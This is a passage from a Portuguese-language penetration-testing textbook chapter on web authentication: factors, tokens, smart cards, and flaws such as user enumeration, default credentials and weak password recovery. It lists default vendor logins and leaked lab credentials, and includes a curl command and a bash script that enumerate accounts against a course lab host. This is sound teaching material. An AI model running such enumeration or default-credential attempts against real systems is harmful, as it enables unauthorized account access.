legtimo antes de fornecerem informaes sensveis, como credenciais de acesso e documentos de projeto. Por outro, a aplicao necessita confirmar a identidade de cada usurio,
para que acessos a regies protegidas sejam devidamente autorizados. O primeiro caso
resolvido, normalmente, por meio do uso do protocolo HTTPS, cujas vulnerabilidades de
implantao so discutidas no Captulo 9. J a autenticao de usurios ser abordada, ao
longo deste captulo, com foco nos problemas de segurana que podem ocorrer.
Um processo de autenticao de entidades sempre envolve a interao entre duas
partes, o reclamante e o verificador, que visam, respectivamente, comprovar a prpria
identidade e averiguar as provas fornecidas pelo primeiro. Nesse contexto, o reclamante
pode utilizar um ou mais fatores abaixo para provar o que deseja:
1 Algo que se sabe: para provar a identidade, o reclamante mostra conhecimento de

uma informao sabida apenas por ele, como senhas e chaves privadas. Esse o fator
mais utilizado para autenticao de usurios em aplicaes web.
1 Algo que se tem: o reclamante deve provar que possui um dispositivo fsico particular, fornecido ou cadastrado anteriormente pelo verificador. Cartelas de senhas,
celulares, smart cards e geradores de senhas nicas so exemplos de tais dispositivos, os quais so comumente empregados em cenrios que requerem um alto nvel
de segurana, como internet banking e declarao de Imposto de Renda.
Captulo 3 - Teste do mecanismo de autenticao
objetivos
Teste do mecanismo de autenticao
87
1 Algo que se : nesse caso, uma pessoa prova a identidade por meio de uma caracte-
rstica fsica ou comportamental (biometria), como ris, voz, retina, impresso digital,
face, padro de digitao, assinatura manual, entre outros. Embora seja possvel utilizar
esse fator em aplicaes web, no muito comum encontr-lo na prtica, pois o custo
dos sensores pode ser elevado e o processo de cadastro de usurios no trivial.
Quando mais de um fator empregado no processo de autenticao, diz-se que ele
multifator, e, de modo geral, isso confere um nvel de segurana superior a solues que se
baseiam em uma nica classe de mecanismo. Uma exceo, porm, engloba aqueles sistemas que permitem que o usurio se autentique com apenas um dos fatores contemplados
e, consequentemente, a segurana equivalente ao mecanismo mais fraco do conjunto.
No caso especfico de biometria, possvel utilizar mais de uma caracterstica fsica ou
comportamental do usurio, para autentic-lo, o que chamado de autenticao biomtrica multimodal. Pode-se dizer que a autenticao de usurios o mecanismo de segurana mais evidente para aqueles que utilizam uma aplicao, pois ele completamente
explcito e obrigatrio.
Quando apresenta falhas, porm, um atacante consegue acesso ilegtimo ao sistema, seja
pela porta da frente, por meio do fornecimento de credenciais vlidas, maliciosamente
obtidas, ou pela lateral, evadindo ou subvertendo a implementao do mecanismo. Em
qualquer dos casos, informaes sensveis da vtima podem ser comprometidas e aes,
realizadas em nome dela. Obviamente, o problema torna-se muito mais crtico caso a conta
violada tenha privilgios administrativos (Meucci et al., 2008; Stuttard e Pinto, 2007).
Este captulo tem por objetivo apresentar as diversas vulnerabilidades que, comumente,
afetam os mecanismos de autenticao de entidades. Com isso em mente, os seguintes
tpicos so cobertos: tecnologias de autenticao, uso de informaes obtidas nas fases de
reconhecimento e de mapeamento, credenciais padronizadas, enumerao de identificadores de usurio, mecanismo vulnervel de recuperao de senhas, funcionalidade lembrar
usurio, transporte inseguro de credenciais, falhas na implementao do mecanismo, troca
de senhas vulnervel, ataque de fora bruta, ataque de dicionrio, ataque contra senhas
armazenadas, polticas de senhas fortes e engenharia social.
Autenticao de usurio
Que fatores podem ser utilizados na autenticao de um usurio?
88
Autenticao de entidades
O que se entende por autenticao de entidades?
Que tecnologias de autenticao voc encontra nas aplicaes web que utiliza?
Tecnologias de autenticao empregadas em aplicaes web

O mecanismo de autenticao de usurios mais comumente empregado por aplicaes
web consiste no fornecimento de identificador e senha, cuja correo deve ser verificada
pela aplicao contra uma base de contas cadastradas. Essa abordagem pode ser implementada por meio das seguintes tecnologias:
1 Autenticao HTTP: baseia-se nos mtodos Basic e Digest, nativos do protocolo HTTP,
que solicitam as credenciais por meio de uma caixa de dilogo exibida ao usurio pelo
navegador web. No muito utilizada em aplicaes acessveis pela internet, salvo em
alguns sistemas de correio eletrnico corporativo. Possui a desvantagem de no permitir
travamento de conta, aps mltiplas tentativas invlidas e sucessivas de autenticao.
1 Autenticao integrada ao Windows: antigamente, conhecida por autenticao

NTLM
Antiga sute de
protocolos de
segurana, desenvolvida
pela Microsoft para uso
em redes Windows, com
o objetivo de prover
autenticao, sigilo e
integridade. Como no
suporta algoritmos
criptogrficos
modernos, no deve
ser empregada em
novas implementaes,
segundo recomendao
do prprio fornecedor.
NTLM ou NT LAN Manager um mtodo suportado pelos produtos da Microsoft, que

utiliza Kerberos ou NTLM no processo de autenticao de usurios. Diferentemente da
autenticao HTTP, primeiro tenta utilizar as informaes de conta Windows presentes
no cliente, antes de solicitar as credenciais para o usurio. Como no capaz de trabalhar em conexes com proxy, nunca empregada em aplicaes web na internet.
1 Autenticao por formulrios: segundo Stuttard e Pinto (2007), essa tecnologia

usada por mais de 90% dos sistemas na internet, devido flexibilidade e facilidade
de personalizao que apresenta. A captura de credenciais ocorre em um formulrio
em HTML e a verificao efetuada no lado do servidor. Polticas de senhas fortes
e controles adicionais de segurana podem ser desenvolvidos da maneira que se
queira, bastando que sejam codificadas pela aplicao ou suportadas pelo arcabouo
de autenticao empregado.
Atualmente, comum que uma nica pessoa tenha contas em dezenas de sites web, que
vo de aplicaes de correio eletrnico a sistemas de internet banking. Uma prtica de
segurana importante que sejam utilizadas senhas diferentes e fortes para cada uma das
contas, mas isso dificulta que o usurio memorize todas elas. Para resolver esse problema,
Kerberos um protocolo de autenticao

de entidades, para
aplicaes cliente/servidor, criado pelo Massachusetts Institute of
Technology (MIT). Utiliza uma terceira parte
confivel e criptografia
simtrica, para corroborar as identidades
das partes envolvidas
e, ao mesmo tempo,
estabelecer uma chave,
para proteo do canal
de comunicao.
funcionalidades para armazenamento seguro de senhas, por meio de uma senha mestra.
Embora alguns riscos de segurana pairem sobre essas solues, ainda uma abordagem
muito melhor que a escrita das senhas em um pedao de papel ou o armazenamento em
arquivo no cifrado.
Outro problema decorrente das solues baseadas em senhas que elas podem ser
capturadas por software malicioso (keylogger) enquanto so digitadas em mquinas
infectadas. Isso levou muitas empresas a adotarem teclados virtuais, como o ilustrado
na Figura 3.1(a), que permitem que o usurio clique nos caracteres que compem a
senha escolhida, anulando a ameaa de interceptao. A resposta criminosa foi a criao
de screenloggers, capazes de gravar regies da tela ao redor do ponto clicado com o
mouse, bem como as coordenadas dessa posio. Um novo avano foi necessrio e,
hoje, alguns teclados virtuais permutam as posies dos elementos, aleatoriamente,
antes de apresent-los, e escondem o smbolo de uma tecla, quando o mouse passa por
cima dela vide Figura 3.1(b).
Aplicaes de internet banking e sistemas que requerem um alto grau de segurana
adotam, frequentemente, tokens como um segundo fator de autenticao.
A forma mais simples consiste em uma cartela contendo cerca de cinquenta senhas de
q
Saiba mais
os navegadores web modernos e sutes de proteo de computadores pessoais apresentam
quatro dgitos geradas aleatoriamente para cada usurio e numeradas sequencialmente
89
vide Figura 3.2(a). Quando uma transao crtica, como transferncia de fundos, requisitada, a aplicao solicita que uma senha especfica da cartela e a senha geral sejam
fornecidas. Se o usurio no possui a cartela correta, a chance de acerto de uma em dez
mil possibilidades, o que razoavelmente seguro, quando o travamento de contas
utilizado. O problema, porm, reside no fato de que adivinhao de senhas no o caminho
adotado pelos criminosos. O que normalmente eles fazem induzir o usurio, por meio de
engenharia social, a acessar uma pgina falsificada e fornecer todas as posies da tabela,
sob pretexto de um problema ter ocorrido na base da aplicao. Infelizmente, ainda hoje,
muitas pessoas so susceptveis a esse tipo de ataque!
Figura 3.1
Teclados virtuais: (a)
Tradicional. (b) Com
proteo contra
screenlogger.
(a)
(b)
Considerando o ataque acima, uma tecnologia mais eficaz, porm mais custosa, compre-
ende dispositivos de gerao de senhas dinmicas, as quais podem ser usadas apenas
uma nica vez pelo usurio. Desse modo, a captura delas torna-se uma ameaa irrelevante, pois no possvel reutiliz-las para autenticao, por serem descartveis.
Porm, como em toda soluo baseada em token, um problema surge quando a pessoa
perde ou danifica o equipamento, porque ela ser impedida de utilizar a aplicao, at
que aquele seja substitudo. De modo geral, esses dispositivos apresentam um visor de
LCD (Figura 3.2(b)), no qual a senha exibida, e, eventualmente, um teclado numrico para
entrada de senha pessoal e desafios. Para que o usurio possa ser validado corretamente,
os tokens precisam estar sincronizados com o servidor de autenticao da aplicao, o que
realizado de acordo com a classe a que pertencem (Harris, 2008):
1 Sncronos: a senha gerada a partir de uma semente secreta e individualizada e

de uma informao, como o horrio ou um contador, as quais so compartilhadas
entre o servidor de autenticao e o dispositivo. No primeiro caso, a senha alterada
depois de transcorrido um intervalo de tempo pr-determinado, enquanto que, no
segundo, o usurio precisa apertar um boto para avanar para o prximo valor.
1 Assncronos: essa classe de dispositivos baseada no seguinte protocolo de

desafio-resposta: o servidor de autenticao gera um nmero aleatrio, que
exibido ao usurio pela aplicao. Este digita o valor no token, juntamente com
a senha pessoal, e a senha resultante calculada e exibida no visor de LCD. Para
encerrar a autenticao, o valor correto deve ser fornecido aplicao, que completa a operao solicitada, somente caso a validao seja realizada com sucesso.
Outra soluo interessante envolvendo tokens consiste no envio, quando necessrio, de
informaes de autenticao ao aparelho celular cadastrado para o usurio.
Por exemplo, ao receber uma requisio de operao crtica, a aplicao gera um nmero
aleatrio de confirmao e o envia, por meio de SMS, ao telefone do cliente, que deve digit-lo
em campo especfico do sistema. Para atacar uma soluo assim, necessrio, alm de
obter as credenciais vlidas de um usurio, adivinhar o valor de confirmao gerado pelo
90
servidor ou ter acesso ao celular da vtima. Um problema dessa tecnologia, porm, que
no h garantia de entrega de mensagens SMS, o que pode impedir a concretizao de uma
transao, se o valor de confirmao no for recebido a tempo.
Figura 3.2
Tokens: (a) Cartela
de senhas. (b)
Dispositivo sncrono
de senhas dinmicas
baseado em horrio.
(a)
(b)
Embora solues baseadas em smart cards e tokens criptogrficos estejam disponveis h

um bom tempo (Hamman et al., 2001), no fcil encontrar aplicaes web que as utilizem,
devido ao alto custo de implantao e dificuldade de operacionalizao. Apesar disso, h um
exemplo de uso dessas tecnologias no cenrio brasileiro, o site da Receita Federal, que
Figura 3.3
Aplicao da
Receita Federal,
que permite acesso
via e-CPF.
O princpio bsico da autenticao por token criptogrfico consiste no protocolo de

desafio-resposta ilustrado, de maneira simplificada, na Figura 3.4:
1. O usurio solicita aplicao a realizao de uma operao crtica.
2. Como resposta, o servidor envia um nmero aleatrio (desafio) ao cliente, que deve
ser assinado digitalmente com a chave privada contida no token.

3. O lado cliente da aplicao solicita ao usurio a senha do smart card.
4. Usurio fornece aplicao a senha de acesso ao smart card.
5. A senha enviada ao smart card, para autenticao do usurio.
permite realizar a autenticao do usurio por meio do e-CPF (vide Figura 3.3).
91
6. A aplicao cliente fornece o desafio para o smart card, para gerao de assinatura.
7. O smart card assina o desafio e o devolve aplicao cliente.

8. O desafio assinado enviado ao servidor, para verificao por meio da chave pblica
cadastrada do usurio. Caso uma resposta positiva seja obtida, possvel corroborar
a identidade do usurio, pois somente ele, que detm o smart card e conhece a senha
de acesso, capaz de gerar uma assinatura digital vlida.
Usurio
(3) Solicita
senha
Smart card
(4) Senha
(5) Senha
(1) Operao crtica
(6) Desao
(2) Desao
(7) Desao assinado
(8) Desao assinado
Aplicao - lado cliente
Aplicao - lado servidor
Alternativamente, possvel calcular um MAC sobre o desafio, em vez de uma assinatura

digital, empregando uma chave simtrica armazenada no dispositivo criptogrfico e compartilhada com a aplicao. Qual dos mecanismos escolher depende do tipo de smart card utilizado, que pode suportar apenas criptografia simtrica ou, tambm, algoritmos assimtricos.
Figura 3.4
Autenticao
de usurio com
smart card.
Conforme visto, uma ameaa contra sistemas baseados em senhas consiste na captura
destas por meio de softwares maliciosos instalados na mquina do usurio. Embora isso
tambm possa acontecer no caso das senhas de acesso s chaves criptogrficas, como
elas nunca deixam o dispositivo criptogrfico, preciso roub-lo, para executar um ataque
efetivo contra a aplicao. Outro cenrio hipottico, mas factvel se o token fica conectado
ao ambiente o tempo inteiro, utilizar o prprio malware que captura a senha para realizar transaes fraudulentas em nome da vtima. Nesse caso, o dispositivo criptogrfico
tratado como um orculo, que responde a todas as perguntas que lhe so direcionadas.
Outro mtodo possvel de corroborar a identidade do usurio, porm, pouco presente
em aplicaes web, emprega o prprio protocolo SSL/TLS, que permite autenticao

mtua de entidades. Isso requer que um certificado digital de usurio e a chave privada
correspondente, normalmente, em formato Public-Key Cryptography Standards #12
(PCKS #12), sejam inseridos no navegador web.
Quando o usurio acessar uma aplicao que requeira o uso de certificado de cliente, o
navegador abre uma janela solicitando que um par de chaves seja escolhido (vide Figura
3.5). Caso o servidor consiga validar o certificado apresentado, a negociao SSL/TLS completada com sucesso, e acesso a regies protegidas da aplicao concedido ao usurio.
As seguintes dificuldades, pelo menos, podem ser enumeradas para a autenticao de
usurio baseada no protocolo SSL/TLS:
1 Dificuldade de implantao: cada usurio da aplicao precisa obter um certificado de

uma autoridade certificadora vlida ou ento a entidade dona da aplicao necessita
criar e manter infraestrutura de chaves pblicas prpria. Qualquer uma das abordagens
gera um custo financeiro e/ou operacional, que, muitas vezes, pode ser proibitivo.
92
PKCS #12
Padro criado pelo
RSA Laboratories, para
o armazenamento e
transferncia seguros de
chaves privadas e outras
informaes sigilosas
de identificao.
1 Proteo da chave privada de usurio: de modo geral, os navegadores web somente

pedem a senha do arquivo PKCS #12, contendo a chave privada, no momento de importao. Aps isso, qualquer pessoa que tenha acesso mquina capaz de se autenticar
na aplicao, selecionando o par de chaves adequado.
1 Controle de acesso: os privilgios de acesso so concedidos com base em configuraes

no servidor web, que especifica os recursos da aplicao que cada usurio pode acessar,
de acordo com o nome contido no certificado. Fica claro que gerenciar os privilgios em
um ambiente assim no nada prtico, pois cada alterao requer que o servidor seja
reiniciado, para que as novas configuraes tornem-se ativas.
Figura 3.5
Tela do Firefox
solicitando escolha
de certificado
para acesso aplicao web.
A ltima tecnologia de autenticao a ser abordada a baseada em biometria, cujas
vertentes mais simples de serem utilizadas em ambientes genricos so as de reconhecimento de face e de locutor.
A razo disso que, atualmente, a grande maioria de computadores pessoais e portteis
possui cmera e microfone instalados, descartando a necessidade de se adquirir equipamento caro e especializado. Esse tipo de soluo requer, como no caso de dispositivos
criptogrficos, que um mdulo no lado cliente, escrito em Java ou ActiveX, por exemplo,
dados biomtricos.
Diversos fatores impedem uma adoo em massa de biometria:
1 O processo de registro de usurio no simples e requer que diversas amostras sejam

coletadas em dois tipos de ambiente: naturais e controlados. Para aplicaes web de propsito geral, isso extremamente complicado de ser realizado, pois o usurio se registra
a partir do prprio computador pessoal, sem interagir fisicamente com a empresa que
oferece o servio.
1 Mtodos biomtricos precisam ser regulados para balancear as taxas de falsos positivos
e falsos negativos. Este ltimo mede a proporo de usurios vlidos que no so autenticados pelo sistema, enquanto que o primeiro avalia a taxa de pessoas, eventualmente
atacantes, que so incorretamente autenticadas como outras.
seja carregado e executado pelo navegador web, para controle do dispositivo de captura de
93
1 Diversos mtodos de ataque foram descritos na literatura para comprometer autenticao biomtrica (Duc e Mihn, 2009; Uludag e Jain, 2004) e as principais estratgias de
mitigao requerem o uso de tecnologia especial ou ferem a usabilidade do sistema.
Vulnerabilidades
Que tipos de vulnerabilidades podem ser encontrados em mecanismos de autenticao?

Um exemplo de vulnerabilidade em mecanismos de autenticao, que afeta diversas
aplicaes web, consiste na submisso de credenciais de acesso, por meio do protocolo

HTTP, o qual no protege a confidencialidade do canal.
Consequentemente, essas informaes podem ser facilmente capturadas, no caminho
at o servidor, e utilizadas por um atacante para autenticar-se no sistema. Para ratificar
esta constatao, considere-se que, at bem pouco tempo atrs, diversos stios de correio
eletrnico funcionavam dessa maneira. Felizmente, isso melhorou muito, hoje em dia, mas
so poucos os que protegem a sesso inteira por meio do protocolo HTTPS, deixando, ainda,
uma brecha para ataques de sequestro de sesso.
Outra tcnica que pode ser empregada para quebrar o mecanismo de autenticao o
ataque por fora bruta, que consiste em testar todas as senhas possveis para um conjunto de identificadores de usurio.
O ponto de partida depende da enumerao de alguns usurios da aplicao, o que pode
ser facilitado pelo uso de identificadores previsveis, contas pr-instaladas ou mensagens
de erro detalhadas. Adicionalmente, para o sucesso da explorao, a aplicao precisa ser
incapaz de travar contas, aps mltiplas tentativas invlidas e sucessivas de autenticao,
alm de no implementar uma poltica de senhas fortes.
Cuidados devem ser tomados para evitar que o mecanismo de autenticao seja
evadido. Um deslize comum, nesse sentido, criar uma pgina de autenticao que,
em caso de sucesso, redireciona o usurio para reas protegidas da aplicao, mas sem
impedir o acesso direto a essas pginas.
Nessa mesma linha, algumas aplicaes podem ser enganadas pela simples manipulao
de parmetros. Por exemplo, um atacante pode, simplesmente, trocar o valor de um campo
escondido, que indica se um usurio est autenticado, de no para sim. Ademais, se o

trecho de cdigo que trata a autenticao contiver erros lgicos, muito provavelmente no
sero necessrias credenciais vlidas para acesso aplicao.
Mecanismos de recuperao e troca de senhas podem, muitas vezes, ser um caminho
Alguns erros que devem ser evitados no primeiro caso compreendem: utilizao de perguntas secretas com respostas fceis de serem adivinhadas; inexistncia de mecanismo de
travamento por tentativas invlidas; e exibio da senha atual, caso o usurio responda corretamente s perguntas secretas. J com relao troca de senhas, ataques so possveis
quando a senha antiga no solicitada, antes da realizao da operao.
94
para acesso no autorizado aplicao.
Para finalizar, importante mencionar que o principal problema com a autenticao de
usurio no de origem tcnica, mas sim de natureza humana.
Para pensar
As pessoas tendem a escolher senhas fceis de serem memorizadas, que so facilmente adivinhadas por terceiros. Quando o sistema verifica a qualidade das senhas,
os usurios criam um arquivo em claro para armazen-las ou penduram um pedao
de papel no monitor com o valor escolhido. Se cartes de senha so empregados,
basta enviar uma mensagem de correio eletrnico, dizendo que houve um problema
no sistema e que a cartela inteira precisa ser fornecida pelo usurio, para se ter
acesso a todos os valores.
Uso de informaes obtidas nas fases de reconhecimento e mapeamento

Conforme visto no Captulo 2, diversas informaes interessantes podem ser obtidas
nas fases de mapeamento e de reconhecimento de aplicaes web. Em alguns casos, so

descobertos identificadores vlidos de usurios, que servem de ponto de partida para um
ataque de fora bruta contra o mecanismo de autenticao ou para quebra da funcionalidade de recuperao de senhas. Em outros cenrios mais favorveis, as informaes
permitem acesso direto s reas protegidas do sistema, o que pode ser muito til, quando
so realizados testes caixa-preta, nos quais, contas vlidas de usurio no so fornecidas.
Por exemplo, observe-se o contedo do arquivo accounts.txt, abaixo ilustrado, que pode ser
encontrado no processo de reconhecimento da aplicao de teste Mutillidae. Tudo indica
que as informaes exibidas so credenciais de acesso aplicao. Assim, basta test-las,
uma a uma, e verificar se possvel autenticar-se como um usurio vlido, conforme
ilustrado na Figura 3.7. As vantagens dessa situao residem no tempo economizado para
obteno de acesso s reas protegidas do sistema e o no disparo de alertas por eventuais
mecanismos de deteco de intruso que estejam instalados no ambiente.
admin, adminpass, Monkey!!!
Figura 3.6
Contedo do arquivo accounts.txt.
john, monkey, I like the smell of confunk

ed, pentest, Commandline KungFu anyone?
adrian, somepassword, Zombie Films Rock!!!
95
Outra fonte de credenciais vlidas, descobertas no mapeamento da aplicao, so
comentrios deixados pelos programadores, no cdigo HTML apresentado ao usurio,

conforme ilustrado na Figura 3.8.
Figura 3.7
Autenticao na
aplicao com dados obtidos na fase
de reconhecimento.
Isso acontece, muitas vezes, quando alguma funcionalidade ainda no est finalizada e os
desenvolvedores deixam um lembrete contendo identificador e senha de teste, para uso
prprio, o qual no removido do cdigo, por esquecimento, antes da liberao do sistema
para produo. Note-se que para essa vulnerabilidade poder ser explorada, contas de teste
devem estar presentes no ambiente final da aplicao, o que configura um problema de
segurana adicional.
Obviamente, descobrir credenciais vlidas logo no incio do teste de invaso representa
o cenrio ideal, mas nem sempre ele pode ser alcanado. Assim, deve-se ter em mente
que outras informaes, como identificadores de usurios, podem ser igualmente teis,
empregando-se outras tcnicas de invaso. Portanto, uma lista deve ser compilada, a
partir dos identificadores encontrados, em fontes pblicas, como redes sociais e listas
de discusso, durante a etapa de reconhecimento.
96
Figura 3.8
Credenciais contidas em comentrio
no cdigo HTML.
Usurio e senha padronizados

Sistemas e plataformas, normalmente, so distribudos com algumas contas padronizadas,
cujas senhas so conhecidas publicamente. Caso aquelas no sejam desativadas ou as

senhas no sejam alteradas, um atacante pode, muito facilmente, obter acesso no autorizado ao sistema, bastando para isso consultar a documentao do fornecedor ou a internet.
Mesmo quando o administrador tem preocupao em definir uma nova senha, comum
que valores simples sejam escolhidos, como pass123, por exemplo. Por esses motivos,
essa verificao deve sempre ser efetuada em um teste de invaso, para todos os elementos
mapeados, pois pode trazer excelentes resultados, com o mnimo de esforo.
Em sistemas desenvolvidos para o uso interno de uma empresa, normal encontrar
contas previsveis como admin, administrator, root, system, test, teste, test123
e guest. As senhas, por sua vez, costumam ser vazias, iguais aos prprios identificadores ou palavras comuns, como password, pass123 e senha (Meucci et al., 2008).
Alm disso, essas contas, normalmente, possuem privilgios administrativos sobre a aplicao, resultando em maior impacto, quando exploradas. Ainda nesse escopo, contas de
novos usurios, muitas vezes, so definidas com senhas padronizadas ou baseadas em uma
regra de formao, dependente do identificador de usurio. Isso cria uma janela de oportunidade para ataques, que perdura at que o novo colaborador substitua a senha inicial.
Para concluir esta seo, a Figura 3.9 lista credenciais conhecidas para alguns sistemas web
Figura 3.9
Exemplos de
conta e senha
padronizadas.
Plataforma/Sistema
Verses
Usurio
Senha
Apache Tomcat
Diversas
admin
admin
Apache Tomcat
Diversas
admin
tomcat
Apache Tomcat
Diversas
tomcat
tomcat
BEA Weblogic
5.1
system
weblogic
IBM WebSphere Application Server
Community Edition
system
manager
Microsoft SQL Server
2000, 2005
sa
MySQL
Todas
root
Oracle Database
Diversas
scott
tiger
Oracle Database
7, 8i
sys
change_on_install
Oracle Database
< 10
system
manager
phpMyAdmin
Todas
root
god
12345
Pligg CMS
Red Hat JBoss
admin
admin
SonicWALL
Todas
admin
password
e plataformas subjacentes encontrados comumente em sistemas de produo.
97
Enumerao de identificadores de usurios

Mesmo quando as informaes levantadas durante as fases de reconhecimento e
mapeamento so suficientes para viabilizar acesso a regies protegidas da aplicao,

importante ter disposio um conjunto de identificadores vlidos de usurios, para se
testar outras potenciais vulnerabilidades.
Vimos, anteriormente, que algumas vezes possvel obt-los diretamente em fontes
pblicas de informao, mas quando isso no acontece, eles devem ser coletados em um
processo denominado de enumerao de usurios.
Uma vulnerabilidade na aplicao, que pode ser explorada para esse propsito, consiste
em se exibir ao usurio mensagens de erro muito especficas, quando a autenticao

no realizada com sucesso.
Observando o exemplo da Figura 3.10, percebe-se que a aplicao indica se o motivo do
problema foi o fornecimento de um identificador inexistente ou de uma senha invlida.
No ltimo caso, logicamente, pode-se concluir que a conta informada foi reconhecida pelo
sistema, se no, a outra mensagem teria sido apresentada.
Desse modo, para enumerar usurios, basta tentar se autenticar no sistema, com uma
srie de possveis identificadores, e observar as mensagens de erro exibidas.
(a)
Figura 3.10
Mensagens de erro
no uniformes em
caso de tentativa
malsucedida de
autenticao:
(a) Usurio existe,
mas senha informada incorreta. (b)
Usurio no existe.
(b)
Como um mecanismo de travamento de conta por tentativas malsucedidas de autenticao

pode estar habilitado, razovel realizar o teste com uma senha plausvel, para no desperdiar uma das chances disponveis. Estratgias eficazes incluem repetir o prprio identificador de usurio ou fornecer uma das senhas comuns, enumeradas na seo anterior
(Stuttard e Pinto, 2007).
Note que a chave para o sucesso da tcnica depende de conseguir discernir a situao em
que a conta invlida daquela em que ela existe, mas a senha informada no a esperada.
Assim, mesmo que as mensagens de erro para os dois casos paream idnticas, deve-se
analis-las detalhadamente, em busca de diferenas sutis que possam existir (Stuttard
e Pinto, 2007; Meucci et al., 2008). Abaixo esto exemplos de caractersticas que podem
98
variar e no serem visualmente perceptveis:
1 Cdigo HTML: as mensagens de erro podem ser visualmente iguais, mas com diferenas no cdigo HTML. Por exemplo, cada pgina pode conter um campo escondido
de cdigo de erro, definido com valor especfico.
1 Ttulo da pgina: corpos das mensagens idnticos, mas com ttulos diferentes indicando cada uma das situaes.
1 Tempo de resposta: a aplicao pode gastar mais tempo para exibir uma mensagem
de erro, quando o identificador existe e a senha incorreta, porque ela precisa

ser transformada e comparada com o valor na base de usurios. Embora isso seja,
normalmente, imperceptvel para um ser humano, uma ferramenta automatizada
capaz de detectar e apontar tal variao no tempo de processamento.
1 Cabealhos da resposta: presena de cabealhos personalizados, que variam de

acordo com o erro ocorrido.
Em um teste de invaso real, fundamental recorrer automatizao, pois um grande
nmero de identificadores de usurio verificado.
O seguinte exemplo ilustra uma maneira de realizar o trabalho empregando o utilitrio curl,
que permite transferir dados por meio de diversos protocolos, inclusive o HTTP. O primeiro
passo consiste em identificar a URL do programa que processa a autenticao e os nomes dos
parmetros enviados. Essas informaes podem ser obtidas interceptando a requisio ou a
partir do cdigo-fonte do formulrio de autenticao, conforme ilustrado na Figura 3.11.
A sintaxe do utilitrio curl, para submeter o formulrio com os parmetros identificados, e a

sada da execuo esto abaixo ilustrados:
~$ curl -s --data userid=admin&senha=admin&Submit1=Login 8

http://form-auth.esr.rnp.br/login.php
<table width=380 border=0 cellpadding=0 cellspacing=1
bgcolor=#424271><tr><td><img src=esr-70f.gif/></td></
tr></table><table width=380 border=1 cellpadding=0
cellspacing=1><tr><td align=center><b>admin, seja bem-vindo!</
b></td></tr></table><table width=380 border=1 cellpadding=0
cellspacing=1><tr><td><br/><a href=http://form-auth.esr.rnp.br/
checkbalance.php?auth=Y&uid=admin>Consultar saldo</a><br/><br/><a
href=http://form-auth.esr.rnp.br>Encerrar sessão</
a><br/><br/></td></tr></table>
Figura 3.11
Cdigo-fonte de
formulrio de
autenticao.
99
Pelo HTML retornado, possvel observar que as credenciais admin/admin so vlidas e que
os textos marcados em vermelho podem ser empregados para identificar uma autenticao
bem-sucedida. Considerando essa informao e tambm que a aplicao exibe as mensagens de erro ilustradas na Figura 3.10, um script para enumerao de usurios est apresentado na Figura 3.12. Esse script obtm a lista de identificadores a partir do arquivo texto
ids, que contm um item por linha e tenta se autenticar usando o mesmo valor para usurio
e senha. Se as credenciais so validadas, um par (id, id) exibido; se no, se a mensagem
de senha incorreta recebida, exibe-se um par (id, ?), indicando conta existente e senha
desconhecida. Nesse caso, importante lembrar que uma das tentativas permitidas foi
consumida antes do bloqueio da conta.
#!/bin/bash
for id in $(cat ids)

do
resp=$(curl -s --data userid=$id&senha=$id&Submit1=Login \
http://form-auth.esr.rnp.br/login.php)
if [ $(echo $resp | grep -c senha incorreta) -ne 0 ];
then
echo ($id, ?)
elif [ $(echo $resp | grep -c bem-vindo) -ne 0 ];
then
echo ($id ,$id)
fi
Figura 3.12
Script para enumerao de usurios.
done
Algumas aplicaes web evitam o ataque de enumerao de identificadores de usurios
na tela de autenticao, exibindo uma mensagem uniforme de erro, quando as credenciais fornecidas no so vlidas.
Apesar disso, o controle no adotado nas demais funcionalidades do sistema, como, por
exemplo, o mecanismo de recuperao de senhas. Consequentemente, o problema, que est ilustrado na Figura 3.13, pode ser explorado empregando a mesma tcnica descrita anteriormente.
(a)
100
(b)
Figura 3.13
Mecanismo vulnervel de recuperao
de senhas, que possibilita enumerao
de usurios: (a) Tela
exibida, quando
identificador existe.
(b) Mensagem de
erro informando
inexistncia de
identificador.
Aplicaes que permitem a criao da prpria conta de acesso, em sua grande maioria,
no tratam a fraqueza em questo durante o processo de cadastro. Quando um identificador j existente fornecido, a aplicao informa o fato ao usurio, revelando, colateralmente, a validade da conta, sem o risco de bloque-la. Nesse caso, entretanto, no
fcil corrigir a vulnerabilidade e, por isso, o risco tende a ser assumido.
A dificuldade de soluo reside nas opes disponveis para lidar com o problema:
1 Uma abordagem consiste em delegar a gerao de identificadores aplicao, mas, para

que o controle seja efetivo, eles precisam ser imprevisveis, dificultando a memorizao
por parte do usurio. Observe que, se esse requisito no for satisfeito, a enumerao de
usurios torna-se trivial.
1 Outra possibilidade utilizar endereos de correio eletrnico como contas de usurio,

os quais devem ser informados durante o registro (Stuttard e Pinto, 2007). Uma notificao enviada ao endereo informado, se a conta existir, ou, caso contrrio, uma
mensagem contendo um link para uma pgina temporria de finalizao do processo.
Mas o que fazer se a conta que se deseja criar for justamente a primeira conta de correio
eletrnico do usurio?
Mecanismo vulnervel de recuperao de senhas

Aplicaes web desenvolvidas para a internet, que permitem que os usurios criem suas
prprias contas, normalmente, possuem uma funcionalidade para auxili-los em casos

de esquecimento da senha de acesso. Uma abordagem comum consiste na exibio de
um lembrete sobre a senha, cadastrado no momento da criao da conta.
O grande problema dessa soluo que os usurios, muitas vezes, definem a dica com o
valor da prpria senha, tornando a vida de um atacante extremamente fcil.
Outra maneira de implementar o requisito baseia-se no uso de perguntas secretas
pr-cadastradas, as quais precisam ser corretamente respondidas pelo suposto
usurio, antes que lhe seja concedido acesso ao mecanismo de recuperao de senha.
A Figura 3.14(a) exemplifica uma interface para recuperao de senhas, baseada em
pergunta secreta, e a Figura 3.14(b), a tela exibida quando a resposta correta fornecida.
Trs fraquezas ficam evidentes nesse exemplo: a primeira est relacionada ao conjunto
limitado de respostas para a pergunta secreta, o que permite um ataque de fora bruta,
no qual o usurio malicioso testa todas as possibilidades, uma a uma. Outra delas consiste
usurio legtimo perceba, salvo se a aplicao informar a data e o horrio da ltima
conexo, no incio de cada sesso. Por fim, a ltima vulnerabilidade consiste no armazenamento das senhas, de um modo que possvel recuper-las em claro. Embora esse
problema seja fundamental para a existncia da fraqueza anterior, ele no implica a
presena daquela em uma aplicao.
Figura 3.14
Mecanismo de
recuperao de
senhas: (a) Pergunta
secreta exibida. (b)
Resultado obtido
quando resposta
correta fornecida.
(a)
(b)
na exibio da senha original, o que possibilita se autenticar no sistema, sem que o
101
Alm das vulnerabilidades supracitadas, um mecanismo de recuperao de senhas pode

estar sujeito a diversos outros problemas de segurana (Stuttard e Pinto, 2007; Meucci et al.,
2008), juntamente, com os meios de explor-los.
Um mecanismo de recuperao de senhas pode estar sujeito a diversos outros pro-
blemas de segurana:
